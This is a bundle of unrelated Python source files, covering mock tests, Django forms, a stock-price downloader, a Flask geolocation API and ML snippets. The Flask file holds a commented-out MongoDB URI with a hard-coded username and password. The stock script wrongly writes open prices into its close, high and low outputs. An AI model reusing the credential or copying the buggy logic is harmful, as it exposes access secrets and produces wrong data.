mock.side_effect = None # side_effect should be disabled explicitly
self.assertEqual(mock(), 'bar')
def test_configure_mock(self): pass # TODO
class SpecTest(unittest.TestCase):
def test_spec(self):
# returns an instance, instead of a class
obj = Mock(spec=Collaborator)
self.assertIsInstance(obj, Collaborator) # pass isinstance tests
self.assertIs(obj.__class__, Collaborator)
self.assertTrue(hasattr(obj, 'do_something_complicated'))
self.assertTrue(hasattr(obj, '_helper'))
self.assertFalse(hasattr(obj, '_data')) # not yet initialized
with self.assertRaises(AttributeError):
obj.xyz # limited get
obj.xyz = None # unlimited set
obj.do_something_complicated.return_value = 3
self.assertEqual(obj.do_something_complicated(), 3) # do not check call signature
def test_spec_set(self):
obj = Mock(spec_set=Collaborator) # stricter variant
#obj = Mock(spec=Collaborator, spec_set=True) # doesn't work
self.assertFalse(hasattr(obj, 'spec_set')) # cannot be changed later
self.assertTrue(hasattr(obj, 'side_effect'))
self.assertIsInstance(obj, Collaborator)
self.assertIs(obj.__class__, Collaborator)
self.assertTrue(hasattr(obj, 'do_something_complicated'))
self.assertTrue(hasattr(obj, '_helper'))
self.assertFalse(hasattr(obj, '_data'))
with self.assertRaises(AttributeError):
obj.xyz # limited get
with self.assertRaises(AttributeError):
obj.xyz = None # limited set
def test_spec_instance_attributes(self):
obj = Mock(spec_set=CollaboratorForTest)
self.assertIsInstance(obj, Collaborator)
self.assertIs(obj.__class__, CollaboratorForTest)
self.assertTrue(hasattr(obj, 'do_something_complicated'))
self.assertTrue(hasattr(obj, '_helper'))
self.assertTrue(hasattr(obj, '_data')) # because of CollaboratorTest._data
with self.assertRaises(AttributeError):
obj.xyz # limited get
with self.assertRaises(AttributeError):
obj.xyz = None # limited set
# XXXForTest only declares attributes, and they can be configured later.
obj._data = create_autospec(str)
obj._data.upper.return_value = 'DATA'
self.assertEqual(obj._data.upper(), 'DATA')
def test_autospec(self):
# Mock(autospec=Collaborator) or Mock(spec=Collaborator, autospec=True) doesn't work
obj = create_autospec(Collaborator, spec_set=True)
self.assertIsInstance(obj, Collaborator) # pass isinstance tests
self.assertIs(obj.__class__, Collaborator)
self.assertTrue(hasattr(obj, 'do_something_complicated'))
self.assertTrue(hasattr(obj, '_helper'))
self.assertFalse(hasattr(obj, '_data')) # not yet initialized
with self.assertRaises(AttributeError):
obj.xyz # limited get
with self.assertRaises(AttributeError):
obj.xyz = None # limited set
with self.assertRaises(TypeError): # check call signature as well
obj.do_something_complicated()
def test_mock_add_spec(self): pass # TODO
class PatchingTest(unittest.TestCase): # TODO patch(), patch_xxx()
@patch.object(THIS_MODULE, 'Collaborator', spec_set=True)
def test_mocking_classes(self, MockCollaborator):
obj = Collaborator('data')
self.assertIs(obj, MockCollaborator.return_value) # instance = return value
self.assertIsInstance(obj, CollaboratorOrig)
self.assertTrue(hasattr(obj, 'do_something_complicated'))
self.assertTrue(hasattr(obj, '_helper'))
self.assertFalse(hasattr(obj, '_data'))
with self.assertRaises(AttributeError):
obj.xyz # limited get
with self.assertRaises(AttributeError):
obj.xyz = None # limited set
@patch.object(THIS_MODULE, 'Collaborator', spec_set=True)
@patch.object(THIS_MODULE, 'CollaboratorForTest', spec_set=True)
def test_nested(self, MockInner, MockOuter): # inner to outer, bottom-up
self.assertIs(MockInner, CollaboratorForTest)
self.assertIs(MockOuter, Collaborator)
def test_partial_mocking(self): pass # TODO
class CallAssertionTest(unittest.TestCase):
def setUp(self):
self.obj = create_autospec(CollaboratorForTest, spec_set=True)
def test_called(self):
fun = self.obj.do_something_complicated
self.assertFalse(fun.called)
fun('foo')
self.assertTrue(fun.called)
def test_reset(self): # reset records, but configuration is retained
fun = self.obj.do_something_complicated
fun.return_value = 3
self.assertEqual(fun('data'), 3)
self.assertTrue(fun.called)
fun.reset_mock()
self.assertFalse(fun.called)
self.assertEqual(fun('data'), 3)
def test_called_and_args(self): # last called with
fun = self.obj.do_something_complicated
self.assertIsNone(fun.call_args)
self.assertEqual(fun.call_args_list, [])
fun('foo')
fun.assert_called_with('foo')
self.assertEqual(fun.call_args, (('foo',),))
self.assertEqual(fun.call_args, call('foo')) # call_args is actually a call object
self.assertEqual(fun.call_args_list, [call('foo')])
with self.assertRaisesRegexp(AssertionError, re.escape(
'''Expected call: do_something_complicated(foobar='foo')\n'''
'''Actual call: do_something_complicated('foo')''')):
fun.assert_called_with(foobar='foo') # equivalent, but not equal
fun('foo', 'bar', extra='foobar')
fun.assert_called_with('foo', 'bar', extra='foobar') # most recent
self.assertEqual(fun.call_args, (('foo', 'bar'), {'extra': 'foobar'}))
self.assertEqual(fun.call_args, call('foo', 'bar', extra='foobar')) # call() is more intuitive
self.assertEqual(fun.call_args_list, [call('foo'), call('foo', 'bar', extra='foobar')])
with self.assertRaisesRegexp(AssertionError, re.escape(
'''Expected call: do_something_complicated('foo')\n'''
'''Actual call: do_something_complicated('foo', 'bar', extra='foobar')''')):
fun.assert_called_with('foo') # not 'ever' called with -> assert_any_call
def test_called_once_with(self): # accumulated
fun = self.obj.do_something_complicated
fun('foo')
fun.assert_called_once_with('foo')
fun('bar')
with self.assertRaisesRegexp(AssertionError, re.escape(
'''Expected to be called once. Called 2 times.''')):
fun.assert_called_once_with('bar') # called twice, regardless of what arguments are
self.assertEqual(fun.call_count, 2)
fun('foobar')
with self.assertRaisesRegexp(AssertionError, re.escape(
'''Expected to be called once. Called 3 times.''')):
fun.assert_called_once_with('foobar')
self.assertEqual(fun.call_count, 3)
def test_any_call(self): # ever called with
fun = self.obj.do_something_complicated
fun('foo')
fun.assert_any_call('foo')
fun('bar')
fun.assert_any_call('bar') # most recently
fun.assert_any_call('foo') # ever called
with self.assertRaisesRegexp(AssertionError, re.escape(
'''do_something_complicated('foobar') call not found''')):
fun.assert_any_call('foobar')
def test_has_calls(self):
fun = self.obj.do_something_complicated
fun(1); fun(2); fun(2); fun(3); fun(4); fun(5); fun(6); fun(7)
# any_order=False: find the consecutive pattern
fun.assert_has_calls([call(2), call(3), call(4)])
with self.assertRaisesRegexp(AssertionError, re.escape(
'''Calls not found.\n'''
'''Expected: [call(2), call(4), call(6)]\n'''
'''Actual: [call(1), call(2), call(2), call(3), call(4), call(5), call(6), call(7)]''')):
fun.assert_has_calls([call(2), call(4), call(6)])
# any_order=True: ever called, regardless of order and times
fun.assert_has_calls([call(4), call(2), call(6)], any_order=True)
with self.assertRaisesRegexp(AssertionError, re.escape(
'''(call(0),) not all found in call list''')):
fun.assert_has_calls([call(4), call(0), call(6)], any_order=True)
def test_calls_as_tuples(self): pass # TODO
def test_mock_method_calls(self):
mock = Mock()
mock()
mock.method().attribute.method()
mock.attribute.method()
# mock_calls: inclusive, recursive; split by '()', good for callable mocks.
self.assertEqual(mock.mock_calls, [
call(),
call.method(),
call.method().attribute.method(),
call.attribute.method()])
# method_calls: exclusive, recursive; terminated by '()', good for non-callable mocks.
self.assertEqual(mock.method_calls, [call.method(), call.attribute.method()])
class NonCallableMockTest(unittest.TestCase): pass # TODO and NonCallableMagicMock
class PropertyMockTest(unittest.TestCase): pass # TODO
if __name__ == '__main__':
unittest.main()
|
import torch.nn as nn
def initialize_weights(*models):
for model in models:
for module in model.modules():
if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):
nn.init.kaiming_normal_(module.weight)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.BatchNorm2d):
module.weight.data.fill_(1)
module.bias.data.zero_()
|
# This is licensed under Apache-2.0 OR MIT |
from simfin.tools import account
class equalization(account):
'''
Classe permettant d'intégrer les revenus issus de la péréquation et de la formule de financement des territoires (FFT).
Parameters
----------
iprice: boolean
Switch pour intégrer ou non la croissance du niveau général des prix.
igdp: boolean
Switch pour intégrer ou non la croissance potentielle du PIB réel.
ipop: boolean
Switch pour intégrer ou non la croissance de la population.
'''
def __init__(self,value,iprice=True,igdp=True,ipop=False,others=None):
self.value = value
self.iprice = iprice
self.igdp = igdp
self.ipop = ipop
return
def grow(self,macro,pop,eco,others=None):
rate = 1.0
if self.iprice:
rate += macro.infl
if self.igdp:
rate += macro.gr_Yp
if self.ipop:
rate += macro.gr_N
if rate < 1.03:
rate = 1.03
self.value *= rate
return
|
#!/bin/env python3
# Author : freeman
# Date : 2021.03.25
# Desc : This software will export by default the past year STOCK price {high, low, open, close}
# : Financialmodelingprep doesnt have all the Class-C mutual fund types.
# : yet, it is the only site with API listngs of Cryptocurrencies.
# :
# use : python3 getStockData.py
# Version : 0.0.1
###################################################################
from datetime import datetime, timedelta
import warnings
import json
import sys
import os.path
from os import path
import socket
__NDAYS_AGO__ = 366
try:
from requests.exceptions import HTTPError
import requests
except ImportError as herr:
print("Missing requests library")
print("pip install --user requests")
try:
import urllib3
except ImportError as err:
warnings.warn('No Package named urllib3 was found. ', ImportWarning)
print(err.__class__.__name__ + " : " + err.__cause__)
sys.exit(1)
def testConn():
try:
socket.create_connection(("www.google.com", 80))
return True
except OSError as err:
print("No Connection: " + err.errno)
return False
def computeDate():
# Sublimate the Date Magic
date_list = []
a = datetime.now()
b = a - timedelta(days=__NDAYS_AGO__)
today_date = str(str(a).split(' ')[0])
days_ago = str(str(b).split(' ')[0])
date_list.append(today_date)
date_list.append(days_ago)
return date_list
# default: https://financialmodelingprep.com/api/v3/historical-price-full/AAPL?from=2020-03-01&to=2021-03-01&apikey=demo
def retrieveStockTickerInfo(t, s, e):
KEY = "YOUR_MODELING_PREDICTION_SITE_KEY"
if KEY == "YOUR_MODELING_PREDICTION_SITE_KEY":
print("You will need to setup and obtain an account before using this software")
sys.exit(2)
else:
pass
url = "https://financialmodelingprep.com/api/v3/historical-price-full/" + t.upper() + "?from=" + s + "&to=" + e + "&apikey=" + KEY
try:
r = requests.get(url=url)
r.encoding = 'ISO-8859-1'
r.raise_for_status()
data = r.json()
except HTTPError as err:
print("Http Connection Error", err.response)
sys.exit()
with open('data.json', 'w', encoding='utf-8') as f:
json.dump(data, f, indent=4, sort_keys=True)
def processFields():
ds, tds, sopen, sclose, shigh, slow = {}, [], {}, {}, {}, {}
tmp1, tmp2 = "", ""
so, sc, sh, sl = {}, {}, {}, {}
with open('data.json', 'r') as f:
ds = json.load(f)
# date:open, high, close, low
tds = ds['historical']
for i in tds:
for k, v in i.items():
if str(k).strip().lower() == "date":
tmp1 = v
if str(k).strip().lower() == "open":
tmp2 = "{:.2f}".format(v)
sopen.update({tmp1:tmp2})
for i in tds:
for k, v in i.items():
if str(k).strip().lower() == "date":
tmp1 = v
if str(k).strip().lower() == "close":
tmp2 = "{:.2f}".format(v)
sclose.update({tmp1:tmp2})
for i in tds:
for k, v in i.items():
if str(k).strip().lower() == "date":
tmp1 = v
if str(k).strip().lower() == "high":
tmp2 = "{:.2f}".format(v)
shigh.update({tmp1:tmp2})
for i in tds:
for k, v in i.items():
if str(k).strip().lower() == "date":
tmp1 = v
if str(k).strip().lower() == "low":
tmp2 = "{:.2f}".format(v)
slow.update({tmp1:tmp2})
# Apparently, one OPEN key:value is blank
ek = [k for k, v in sopen.items() if not v]
for k in ek:
del sopen[k]
# sorting
tmp = sorted(sopen,reverse=True)
for k in tmp:
so.update({k:sopen[k]})
# sorting
tmp = sorted(sclose,reverse=True)
for k in tmp:
sc.update({k:sopen[k]})
# sorting
tmp = sorted(shigh,reverse=True)
for k in tmp:
sh.update({k:sopen[k]})
# sorting
tmp = sorted(slow,reverse=True)
for k in tmp:
sl.update({k:sopen[k]})
# Most recent on top with title
x1 = {"date":"open"}
x2 = {"date":"close"}
x3 = {"date":"high"}
x4 = {"date":"low"}
so = {**x1, **so}
sc = {**x2, **sc}
sh = {**x3, **sh}
sl = {**x4, **sl}
return so, sc, sh, sl
def processFieldsRev():
ds, tds, sopen, sclose, shigh, slow = {}, [], {}, {}, {}, {}
tmp1, tmp2 = "", ""
so, sc, sh, sl = {}, {}, {}, {}
with open('data.json', 'r') as f:
ds = json.load(f)
# date:open, high, close, low
tds = ds['historical']
for i in tds:
for k, v in i.items():
if str(k).strip().lower() == "date":
tmp1 = v
if str(k).strip().lower() == "open":
tmp2 = "{:.2f}".format(v)
sopen.update({tmp1:tmp2})
for i in tds:
for k, v in i.items():
if str(k).strip().lower() == "date":
tmp1 = v
if str(k).strip().lower() == "close":
tmp2 = "{:.2f}".format(v)
sclose.update({tmp1:tmp2})
for i in tds:
for k, v in i.items():
if str(k).strip().lower() == "date":
tmp1 = v
if str(k).strip().lower() == "high":
tmp2 = "{:.2f}".format(v)
shigh.update({tmp1:tmp2})
for i in tds:
for k, v in i.items():
if str(k).strip().lower() == "date":
tmp1 = v
if str(k).strip().lower() == "low":
tmp2 = "{:.2f}".format(v)
slow.update({tmp1:tmp2})
# Apparently, one OPEN key:value is blank
ek = [k for k, v in sopen.items() if not v]
for k in ek:
del sopen[k]
# sorting
tmp = sorted(sopen)
for k in tmp:
so.update({k:sopen[k]})
# sorting
tmp = sorted(sclose)
for k in tmp:
sc.update({k:sopen[k]})
# sorting
tmp = sorted(shigh)
for k in tmp:
sh.update({k:sopen[k]})
# sorting
tmp = sorted(slow)
for k in tmp:
sl.update({k:sopen[k]})
# Most recent on bottom with title
x1 = {"date":"open"}
x2 = {"date":"close"}
x3 = {"date":"high"}
x4 = {"date":"low"}
so = {**x1, **so}
sc = {**x2, **sc}
sh = {**x3, **sh}
sl = {**x4, **sl}
return so, sc, sh, sl
def writeToDisk(t, so, sc, sh, sl):
fname1 = t + "_open_data.csv"
fname2 = t + "_close_data.csv"
fname3 = t + "_high_data.csv"
fname4 = t + "_low_data.csv"
tmp = ""
with open(fname1, "w", encoding='utf-8' ) as f:
for k, v in so.items():
tmp = str(k)+','+str(v)+"\n"
f.write(tmp)
tmp = ""
with open(fname2, "w", encoding='utf-8' ) as f:
for k, v in sc.items():
tmp = str(k)+','+str(v)+"\n"
f.write(tmp)
tmp = ""
with open(fname3, "w", encoding='utf-8' ) as f:
for k, v in sh.items():
tmp = str(k)+','+str(v)+"\n"
f.write(tmp)
tmp = ""
with open(fname4, "w", encoding='utf-8' ) as f:
for k, v in sl.items():
tmp = str(k)+','+str(v)+"\n"
f.write(tmp)
tmp = ""
def writeToDiskRev(t, so, sc, sh, sl):
fname1 = t + "_open_data_rev.csv"
fname2 = t + "_close_data_rev.csv"
fname3 = t + "_high_data_rev.csv"
fname4 = t + "_low_data_rev.csv"
tmp = ""
with open(fname1, "w", encoding='utf-8' ) as f:
for k, v in so.items():
tmp = str(k)+','+str(v)+"\n"
f.write(tmp)
tmp = ""
with open(fname2, "w", encoding='utf-8' ) as f:
for k, v in sc.items():
tmp = str(k)+','+str(v)+"\n"
f.write(tmp)
tmp = ""
with open(fname3, "w", encoding='utf-8' ) as f:
for k, v in sh.items():
tmp = str(k)+','+str(v)+"\n"
f.write(tmp)
tmp = ""
with open(fname4, "w", encoding='utf-8' ) as f:
for k, v in sl.items():
tmp = str(k)+','+str(v)+"\n"
f.write(tmp)
tmp = ""
def main():
ticker, start_date, end_date = "", "", ""
ticker = input("Enter in a stock Ticker >> ").strip()
start_date = input("Enter in a Start date in form yyyy-mm-dd or blank >> ").strip()
end_date = input("Enter in a End date in form yyyy-mm-dd or blank >> ").strip()
# man, parsing JSON data is giving me major heart burn
# brain wasnt functional when i wanted to work on this part below
if testConn() == True:
if ticker.isspace() or ticker == "" or ticker == None:
print("Ticker Field is Blank, where it must have a single Stock value !")
sys.exit(1)
else:
if ( start_date.isspace() or start_date == "" or start_date == None ) and ( end_date.isspace() or end_date == "" or end_date == None ):
start_date = str(computeDate()[0]).strip()
end_date = str(computeDate()[1]).strip()
retrieveStockTickerInfo(ticker, end_date, start_date)
a,b,c,d = processFields()
writeToDisk(ticker, a,b,c, d)
a,b,c,d = processFieldsRev()
writeToDiskRev(ticker, a,b,c,d)
elif ( not start_date.isspace() or not start_date == "" or not start_date == None) and ( not end_date.isspace() or not end_date == "" or not end_date == None):
retrieveStockTickerInfo(ticker, start_date, end_date)
a,b,c,d = processFields()
writeToDisk(ticker, a,b,c, d)
a,b,c,d = processFieldsRev()
writeToDiskRev(ticker, a,b,c,d)
else:
print("idk")
sys.exit(1)
else:
print("No Internet Connection, apparently.")
if __name__ == "__main__":
main()
|
from fastapi.testclient import TestClient
from depot_server.api import app
from depot_server.helper.auth import Authentication
from depot_server.model import BayInWrite, Bay
from tests.db_helper import clear_all
from tests.mock_auth import MockAuthentication, MockAuth
def test_bay(monkeypatch, motor_mock):
monkeypatch.setattr(Authentication, '__call__', MockAuthentication.__call__)
with TestClient(app) as client:
clear_all()
create_bay = BayInWrite(external_id='bay_1', name="Bay 1", description="Top Left")
resp = client.post(
'/api/v1/depot/bays', data=create_bay.json(), auth=MockAuth(sub='admin1', roles=['admin']),
)
assert resp.status_code == 201, resp.text
created_bay = Bay.validate(resp.json())
assert BayInWrite.validate(created_bay) == create_bay
resp = client.get('/api/v1/depot/bays', auth=MockAuth(sub='user1'))
assert resp.status_code == 200, resp.text
bays = [Bay.validate(b) for b in resp.json()]
assert len(bays) == 1
assert bays[0] == created_bay
resp = client.get(f'/api/v1/depot/bays/{created_bay.id}', auth=MockAuth(sub='user1'))
assert resp.status_code == 200, resp.text
assert Bay.validate(resp.json()) == created_bay
update_bay = BayInWrite(external_id='bay_1_upd', name="Bay 1 Upd", description="Top Right")
resp = client.put(
f'/api/v1/depot/bays/{created_bay.id}', data=update_bay.json(), auth=MockAuth(sub='admin1', roles=['admin'])
)
assert resp.status_code == 200, resp.text
updated_bay = Bay.validate(resp.json())
assert BayInWrite.validate(updated_bay) == update_bay
resp = client.delete(
f'/api/v1/depot/bays/{created_bay.id}', auth=MockAuth(sub='admin1', roles=['admin'])
)
assert resp.status_code == 200, resp.text
resp = client.get('/api/v1/depot/bays', auth=MockAuth(sub='user1'))
assert resp.status_code == 200, resp.text
assert len(resp.json()) == 0
|
"""
Radix Sort
In computer science, radix sort is a non-comparative integer sorting
algorithm that sorts data with integer keys by grouping keys by the
individual digits which share the same significant position and value.
A positional notation is required, but because integers can represent
strings of characters (e.g., names or dates) and specially formatted
floating point numbers, radix sort is not limited to integers.
Where does the name come from?
In mathematical numeral systems, the radix or base is the number of
unique digits, including the digit zero, used to represent numbers
in a positional numeral system. For example, a binary system
(using numbers 0 and 1) has a radix of 2 and a decimal system
(using numbers 0 to 9) has a radix of 10.
Efficiency
The topic of the efficiency of radix sort compared to other sorting
algorithms is somewhat tricky and subject to quite a lot of
misunderstandings. Whether radix sort is equally efficient,
less efficient or more efficient than the best comparison-based
algorithms depends on the details of the assumptions made.
Radix sort complexity is O(wn) for n keys which are integers
of word size w. Sometimes w is presented as a constant, which
would make radix sort better (for sufficiently large n) than
the best comparison-based sorting algorithms, which all perform
O(n log n) comparisons to sort n keys.
However, in general w cannot be considered a constant: if all n keys
are distinct, then w has to be at least log n for a random-access
machine to be able to store them in memory, which gives at best a
time complexity O(n log n). That would seem to make radix sort at
most equally efficient as the best comparison-based sorts
(and worse if keys are much longer than log n).
Best Average Worst Comments
n * k n * k n * k k - length of longest key
""" |
from django import forms
from django.contrib.auth.forms import UserChangeForm, PasswordChangeForm, UserCreationForm
from django.contrib.auth.models import User
from mainapp.models import Tickets, News, UserProfile
class NewsForm(forms.ModelForm):
class Meta:
model = News
fields = (
'title',
'text',
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for name, item in self.fields.items():
item.widget.attrs['class'] = 'form-control mt-2'
item.widget.attrs['style'] = 'resize: none'
item.help_text = ''
class SupportForm(forms.ModelForm):
class Meta:
model = Tickets
fields = (
'message',
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for name, item in self.fields.items():
item.widget.attrs['class'] = f'form-control {name} form-control'
item.widget.attrs['style'] = f'resize: none'
item.widget.attrs['placeholder'] = f'Опишите вашу проблему, как можно точнее.'
class CreateSupportForm(forms.ModelForm):
class Meta:
model = Tickets
fields = (
'category',
'title',
'message',
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for name, item in self.fields.items():
item.widget.attrs['class'] = f'form-control {name} form-control'
item.widget.attrs['style'] = f'resize: none'
class SupportFormAdmin(forms.ModelForm):
class Meta:
model = Tickets
fields = (
'category',
'title',
'answer',
'status',
'desk',
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for name, item in self.fields.items():
item.widget.attrs['class'] = f'form-control {name} form-control'
item.widget.attrs['style'] = f'resize: none'
class ChangeForm(UserChangeForm):
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for name, item in self.fields.items():
item.widget.attrs['class'] = 'form-control'
item.help_text = ''
if name == 'password':
item.widget = forms.HiddenInput()
class ChangeFormAdmin(UserChangeForm):
class Meta:
model = User
fields = (
'username',
'first_name',
'last_name',
'email',
'is_superuser',
'is_staff',
'is_active',
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for name, item in self.fields.items():
item.widget.attrs['class'] = 'form-control'
self.fields['is_superuser'].widget.attrs.update({'class': 'checkbox_animated'})
self.fields['is_staff'].widget.attrs.update({'class': 'checkbox_animated'})
self.fields['is_active'].widget.attrs.update({'class': 'checkbox_animated'})
item.help_text = ''
if name == 'password':
item.widget = forms.HiddenInput()
class ChangePassword(PasswordChangeForm):
class Meta:
model = User
fields = 'password'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for name, item in self.fields.items():
item.widget.attrs['class'] = 'form-control'
def get_form(self, form_class):
return form_class(self.request.user, **self.get_form_kwargs())
class RegisterFormAdmin(UserCreationForm):
class Meta:
model = User
fields = (
'username',
'first_name',
'last_name',
'password1',
'password2',
'email',
'is_superuser',
'is_staff',
'is_active',
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for name, item in self.fields.items():
item.widget.attrs['class'] = f'form-control {name}'
self.fields['is_superuser'].widget.attrs.update({'class': 'checkbox_animated'})
self.fields['is_staff'].widget.attrs.update({'class': 'checkbox_animated'})
self.fields['is_active'].widget.attrs.update({'class': 'checkbox_animated'})
item.help_text = ''
def save(self, commit=True):
user = super().save(commit=commit)
UserProfile.objects.create(user=user)
return user
|
from flask import Flask, request, render_template
from flask_pymongo import PyMongo
from CSVtogeoJSON import convert, panda_processing
from geojson import Feature, FeatureCollection, Point
import pandas as pd
import os
import json
from flask_restful import reqparse
# Install Redis to help with caching?
#from flask_cache import Cache
app = Flask(__name__, template_folder='templates')
#app.config['MONGO_URI'] = "mongodb://testuser:Transloc@transloccluster-shard-00-00-fwvjk.mongodb.net:27017,transloccluster-shard-00-01-fwvjk.mongodb.net:27017,transloccluster-shard-00-02-fwvjk.mongodb.net:27017/test?ssl=true&replicaSet=TranslocCluster-shard-0&authSource=admin&retryWrites=true"
#mongo = PyMongo(app)
@app.route('/')
def index():
return render_template("index.html")
# if ./file/latlong.csv exists we can reuse that file jsonified
# otherwise we'll need to process the raw starting data
script_dir = os.path.dirname(__file__)
starting_data_rel_path = "uploaded_data"
starting_data_abs_path = os.path.join(script_dir, starting_data_rel_path)
starting_data_file = starting_data_abs_path+'/'+"GeoLite2-City-Blocks-IPv4.csv"
processed_data_rel_path = "static/files"
processed_data_abs_path = os.path.join(script_dir, processed_data_rel_path)
processed_data_file = processed_data_abs_path+'/'+"latlong.csv"
# Return all coordinates
#TODO look into returning in chunks
@app.route('/ipv4')
def ipv4():
# Check if file exists first to avoid processing it again
if (os.path.isfile(processed_data_file)):
print ('Re-using existing file')
#file exists, reuse it
df = pd.read_csv(processed_data_file, names=['longitude','latitude'])
else:
print ('I\'m working on something new')
df = panda_processing(starting_data_file)
#TODO implement caching
# Caching at this point would be ideal
# for now write to file to ensure we only have to do this once
df.to_csv(processed_data_file, index = False, header = False)
df_to_json = {
'key':df.to_dict(orient='records')
}
matching_results=json.dumps(df_to_json)
return matching_results, 200
# Takes in top left and bottom right coordinates to create a box
# returns all coordinates within the created box
# Does not auto populate data
@app.route('/ipv4/box')
def box_coordinates():
parser = reqparse.RequestParser()
parser.add_argument('coords')
# we now have a dict with in the form of {cords:a,b,c,d}
args = parser.parse_args()
# We only care about the values
values = args.values()
for i in values:
i = str(i)
coords =i.split(',')
# Basic error handling
# Check that we have 4 coordinates
if (len(coords) != 4):
return 'Four coordinates are required', 400
# Check that we didn't get passed an empty coordinate
for test in coords:
if not test:
return 'Empty coordinate found', 400
# Make the coordinates human readable
tl_long = float(coords[0])
tl_lat = float(coords[1])
br_long = float(coords[2])
br_lat = float(coords[3])
if ((tl_long >= br_long) or (tl_lat >= br_lat)):
return 'Invalid boundary', 400
# Coordinates are now in the order of top left longitude, top left latitude
# bottom right longitude, bottom right latitude
if (os.path.isfile(processed_data_file)):
df = pd.read_csv(processed_data_file, names=['longitude','latitude'])
df2 = df.loc[ (df['longitude'] >= tl_long)&
(df['longitude'] <= br_long)&
(df['latitude'] >= tl_lat)&
(df['latitude'] <= br_lat)]
# convert the dataframe back to a json type
df_to_json = {
'key':df2.to_dict(orient='records')
}
matching_results=json.dumps(df_to_json)
return matching_results, 200
else:
return 'Data not loaded yet', 404
return 'Unexpected error', 500
# Takes approximately 2m30s to process/convert full sized (~188Mb) dataset
@app.route('/upload/<string:file_to_process>', methods=['POST'])
def uploadNewCSV(file_to_process):
if (request.method == 'POST'):
convert(file_to_process)
# Below is used for creating a collection in mlab
# geoData = convert(file_to_process)
# Collection size is much to large for mlab
# Need to look at GridFS
#user = mongo.db.geo
#user.insert(geoData)
return "I got a file named " + file_to_process, 200
else:
return "upload only supports the POST method", 400
if __name__ == '__main__':
app.run(debug=True) |
# Copyright (c) 2019 Karl Sundequist Blomdahl <karl.sundequist.blomdahl@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import numpy as np
import tensorflow as tf
from . import normalize_getting, conv2d, cast_to_compute_type
from .batch_norm import batch_norm_conv2d
from .dense import dense
from .recompute_grad import recompute_grad
from .orthogonal_initializer import orthogonal_initializer
def value_head(x, mode, params):
"""
The value head attached after the residual blocks as described by DeepMind:
1. A convolution of 8 filter of kernel size 3 × 3 with stride 1
2. Batch normalisation
3. A relu non-linearity
4. A fully connected linear layer that outputs a vector of size 1
5. A tanh non-linearity outputting a scalar in the range [-1, 1]
"""
num_channels = params['num_channels']
num_samples = 2
def _forward(x, is_recomputing=False):
""" Returns the result of the forward inference pass on `x` """
y = batch_norm_conv2d(x, 'conv_1', (3, 3, num_channels, num_samples), mode, params, is_recomputing=is_recomputing)
y = tf.nn.relu(y)
zo = conv2d(y, 'conv_2', [1, 1, num_samples, 1])
zo = tf.reshape(zo, [-1, 361])
zo = tf.nn.tanh(zo)
z = tf.reshape(y, [-1, 361 * num_samples])
z = dense(z, 'linear_2', (361 * num_samples, 1), value_offset_op, mode, params, is_recomputing=is_recomputing)
z = tf.nn.tanh(z)
return tf.cast(z, tf.float32), tf.cast(zo, tf.float32), tf.cast(tf.reshape(y, [-1, 361, num_samples]), tf.float32)
return _forward(x)
def value_offset_op(shape, dtype=None, partition_info=None):
return np.array([-0.00502319782])
def ownership_loss(*, labels=None, logits=None):
categorical_labels = tf.stack([(1 + labels) / 2, (1 - labels) / 2], axis=2)
categorical_logits = tf.stack([logits, -logits], axis=2)
loss = tf.compat.v1.losses.softmax_cross_entropy(
categorical_labels,
categorical_logits,
label_smoothing=0.2,
reduction=tf.compat.v1.losses.Reduction.NONE
)
return tf.reduce_mean(input_tensor=loss, axis=[1], keepdims=True)
|
filename = "VehiclesItaly.txt"
X = []
y = []
with open(filename, 'r') as f:
for line in f.readlines():
xt, yt = [float(i) for i in line.split(',')]
X.append(xt)
y.append(yt)
# Train/test split
num_training = int(0.8 * len(X))
num_test = len(X) - num_training
import numpy as np
# Training data
X_train = np.array(X[:num_training]).reshape((num_training,1))
y_train = np.array(y[:num_training])
# Test data
X_test = np.array(X[num_training:]).reshape((num_test,1))
y_test = np.array(y[num_training:])
# Create linear regression object
from sklearn import linear_model
linear_regressor = linear_model.LinearRegression()
# Train the model using the training sets
linear_regressor.fit(X_train, y_train)
# Predict the output
y_train_pred = linear_regressor.predict(X_train)
# Plot outputs
import matplotlib.pyplot as plt
plt.figure()
plt.scatter(X_train, y_train, color='green')
plt.plot(X_train, y_train_pred, color='black', linewidth=4)
plt.title('Training data')
plt.show()
y_test_pred = linear_regressor.predict(X_test)
plt.figure()
plt.scatter(X_test, y_test, color='green')
plt.plot(X_test, y_test_pred, color='black', linewidth=4)
plt.title('Test data')
plt.show()
# Measure performance
import sklearn.metrics as sm
print("Mean absolute error =", round(sm.mean_absolute_error(y_test, y_test_pred), 2))
print("Mean squared error =", round(sm.mean_squared_error(y_test, y_test_pred), 2))
print("Median absolute error =", round(sm.median_absolute_error(y_test, y_test_pred), 2))
print("Explain variance score =", round(sm.explained_variance_score(y_test, y_test_pred), 2))
